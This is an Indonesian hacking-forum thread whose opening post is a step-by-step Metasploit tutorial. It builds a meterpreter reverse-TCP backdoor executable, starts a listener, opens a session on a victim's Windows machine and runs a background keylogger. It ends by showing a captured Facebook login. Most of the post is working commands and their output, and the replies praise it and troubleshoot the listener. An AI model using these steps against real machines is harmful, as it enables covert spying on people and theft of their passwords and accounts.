> > > > >


mengaktifkan keylogger dengan meterpreter
zee eichel Offline
IBTeam Server Sysadmn
269 - 2,291
#1
11-05-2011, 11:30 AM
Udah lama gk nulis mengenai meterpreter di blog ini… hmm memang sangar sih ahhahaha..ya udah langsung ja. Artikel metasploit kali ini adalah tentang bagaimana kita mengaktifkan keylogger setelah kita mendapatkan akses meterpreter di pc korban.

+=======================+
+ vurln on
+=======================+
+
+windows xp1, xp2, xp3
+windows vista
+windows 7
+windows 8
+
+=======================+

hmmm ya udah kita coba praktekan yah… pertama2 sih ane menjalankan perintah-perintah metasploit payload standart

Code:
zee@eichel:~# ifconfig
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
inet addr:192.168.1.3 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:62775 errors:0 dropped:0 overruns:0 frame:0
TX packets:73688 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:21990075 (21.9 MB) TX bytes:8620397 (8.6 MB)
Interrupt:43 Base address:0×4000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:204 errors:0 dropped:0 overruns:0 frame:0
TX packets:204 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13520 (13.5 KB) TX bytes:13520 (13.5 KB)

Perintah di atas tadi adalah agar kita bisa tau ip address yang hendak kita pasang di msfcli (listener) dan msfpayload (backdoor)

[Image: screenshot.png]

+———————+
+creating backdoor +
+———————+

zee@eichel:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 x > /var/www/bd.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“LHOST”=>”192.168.1.3″}

Perintah di atas adalah perintah untuk membuat backdoor berbasis windows dan membuka meterpreter dengan LHOST yang diisikan IP kita , kemudian akan tersimpan di directory /var/www .

[Image: screenshot-1.png]

+——————+
+listener mode on
+——————-+

Code:
zee@eichel:~# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.3 LPORT=4444 E
[*] Please wait while we load the module tree…

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ — –=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13733 updated 96 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 96 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

PAYLOAD => windows/meterpreter/reverse_tcp_allports
LHOST => 192.168.1.3
LPORT => 4444
[*] Started reverse handler on 192.168.1.3:4444
[*] Starting the payload handler…

ok tahap listener sudah selesai… kita tinggal menunggu signal dari backdoor yang telah kita buat tadi dan ane anggap sudah di dalam komputer target dan diesekusi oleh si target.

[Image: screenshot-2.png]

dan setelah di esekusi target …

Code:
PAYLOAD => windows/meterpreter/reverse_tcp_allports
LHOST => 192.168.1.3
LPORT => 4444
[*] Started reverse handler on 192.168.1.3:4444
[*] Starting the payload handler…
[*] Sending stage (752128 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.14:1054) at 2011-11-05 02:56:07 +0700
meterpreter >

yup meterpreter sudah terbuka pada [192.168.3] port 4444 dan di akses oleh komputer target [192.168.14] pada port 1054

[Image: screenshot-3.png]

+————————–+
+gathering information+
+————————–+

selanjutnya kita cek informasinya …

Code:
meterpreter > sysinfo
System Language : en_xx
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer : server_name
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

hmmmm selanjutnya kita tinggal menjalankan inti pembicaraan kita ok menjalankan service keylogger di sana … ok deh

Code:
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1508
[*] Migration Successful!!
[*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5810.txt
[*] Recording
[*] Saving last few keystrokes

[Image: screenshot-5.png]

dengan melihat hasil command di atas dapat kita lihat bahwa meterpreter secara otomatis mencari proses explorer.exe yang berjalan di komputer target dan secara otomatis melakukan migrating ke pid tersebut (1508). Secara manual biasanya kita melakukan perintah ps untuk melihat proses kemudian dilanjutkan dengan migrating [pid] [proses id]. Hasil dari rekaman keylogger dari setiap keystroke korban disimpan di /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5810.txt

ironis memang klo disaat kita memulai keylogger tersebut jika misalkan si korban meninggalkan komputer gara-gara kebelet, atau di telp pacar sehingga dia tidak mengetik apa-apa sehingga tidak ada log yang tercipta untuk “last keystroke” yang telah di record pada dir di atas.

Untuk itu kita jalankan proses recording di background saja

Code:
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1508
[*] Migration Successful!!
[*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5810.txt
[*] Recording
[*] Saving last few keystrokes

[*] Interrupt
[*] Stopping keystroke sniffer…
meterpreter > bgrun keylogrecorder
[*] Executed Meterpreter with Job ID 0
meterpreter > [*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5950.txt
[*] Recording

[Image: screenshot-7.png?w=300&h=161]

saya membatalkan proses recording pertama kemudian melanjutkanya dengan proses bgrun. kita cek iddle time dari korban

meterpreter > idletime
User has been idle for: 2 mins 20 secs

ternyata sudah 2 menitan korban iddle atau tidak melakukan kegiatan keyboard maupun mouse.

+———-+
+hasil log+
+———-+

Ane melakukan testing terhadap keylogger stroke yang telah merekam dan secara otomatis di simpan pada directory /root/.msf4/logs/scripts/keylogrecorder/

Code:
zee@eichel:~# less /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5950.txt

[Image: screenshot-6.png]

atau kita bisa melihat dengan menggunakan cara

Code:
zee@eichel:~/.msf4/logs/scripts/keylogrecorder# grep -v ^$ 192.168.1.14_20111105.5950.txt|more
facebook.com
ro [email protected] benisayangamu

[Image: screenshot-8.png]

nah melihat log seperti ini sih sebenarnya tinggal dari logika saja… karena berbeda dengan sniffing yang merekam semua user name dan password…keystroke keylogger mencuri semua hasil keystroke atau hasil penekanan terhadap keyboard sehingga apa saja yang di ketik oleh korban akan terekam… dan tentu saja agak sulit untuk kita melihat mana yang password mana yang bukan… tapi di lihat dari log di atas agaknya korban membuka browser kemudian mengetik facebook.com untuk memanggil site tersebut pada url bar, lalu memasukan email dan password pada tab login.

semoga berguna tutor saya kali ini..

di sadur dari postingan asli
http://zeestuff.wordpress.com/2011/11/05...terpreter/

trimsssss

thx to : skeleton_flowers class training for this inspiration .. special for nasa, oyi, eazaezz, iyan_squid .. and my brother liyan oz ..

for all staff and member IBT ...


FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
www.dutalinux.org
 
Website Find
Reply

NoseTrave Offline
Share
17 - 203
#2
11-05-2011, 11:32 AM
I love backtrack

Wah Om Zee Sangat Bermanfaat

Thanks!
root@nosetrave:~# ./plagiat.sh
English motherfucker, do you speak it ?
root@nosetrave:~#

 
Website Find
Reply

cassaprodigy Offline
Coder
76 - 1,101
#3
11-05-2011, 11:34 AM
wah mantap zee... worked on win 8 pula... sippp thx for this tutorial
 
Find
Reply

THJC Offline
Linuxtivist
112 - 2,625
#4
11-05-2011, 12:42 PM
wah keren... win8 ternyata masih mengandung vulnerable
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog
 
Website Find
Reply

blackmiracle$ Offline
Donatur
4 - 80
#5
11-05-2011, 02:03 PM
om port yang terbuka di korban harus port 1054 aja yah om??klo port lain yang terbuka gimana tuh om??
blackmiracle@Back|track:~#I AM LINUXER
 
Find
Reply

koecroet Offline
<<-- yang punya naga
44 - 808
#6
11-05-2011, 02:32 PM
(11-05-2011, 02:03 PM)blackmiracle Wrote: om port yang terbuka di korban harus port 1054 aja yah om??klo port lain yang terbuka gimana tuh om??

yg terpenting udah masuk ke meterpreternya om Smile
[shcode=This_site_xss-ed]
 
Website Find
Reply

blackmiracle$ Offline
Donatur
4 - 80
#7
11-05-2011, 02:52 PM
om ane ada masalah disini nih ??..napa yah ??

Code:
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.56.1 LPORT=4444 E
[*] Please wait while we load the module tree...
Warning: The following modules could not be loaded!

    /opt/framework/msf3/modules/post/windows/gather/dig.rb: SyntaxError (eval):56: Invalid next

[-] WARNING! The following modules could not be loaded!
[-]     /opt/framework/msf3/modules/post/windows/gather/dig.rb: SyntaxError (eval):56: Invalid next


Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)


Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................


Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing



       =[ metasploit v4.1.2-dev [core:4.1 api:1.0]
+ -- --=[ 756 exploits - 397 auxiliary - 111 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14148 updated yesterday (2011.11.03)

PAYLOAD => windows/meterpreter/reverse_tcp_allports
LHOST => 192.168.56.1
LPORT => 4444
[-] Handler failed to bind to 192.168.56.1:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit exception: The address is already in use (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
napa tuh om??mohon jawabannya..
blackmiracle@Back|track:~#I AM LINUXER
 
Find
Reply

cassaprodigy Offline
Coder
76 - 1,101
#8
11-05-2011, 02:55 PM
dilihat dari prosesnya om sudah memakali port 4444 ... jadi om harus kill dulu .. cek saja dengan netstat
 
Find
Reply

blackmiracle$ Offline
Donatur
4 - 80
#9
11-05-2011, 03:45 PM
(11-05-2011, 02:55 PM)cassaprodigy Wrote: dilihat dari prosesnya om sudah memakali port 4444 ... jadi om harus kill dulu .. cek saja dengan netstat

oh gitu om..yah sih tadi saya pake itu sampe 3 kali..soalnya error mulu om..klo warning kernel panik diatas maksudnya apa yah om??takut ada masalah nih ma BTnya..
blackmiracle@Back|track:~#I AM LINUXER
 
Find
Reply

xsan-lahci Offline
keynotfound
92 - 1,216
#10
11-05-2011, 03:59 PM
bagus nh treadnya,waktu iitu saya pernah baca tapi msfgui ka,sebenernya sama aja atau lebih powerfull yang ini ??
 
Find
Reply






Users browsing this thread: 1 Guest(s)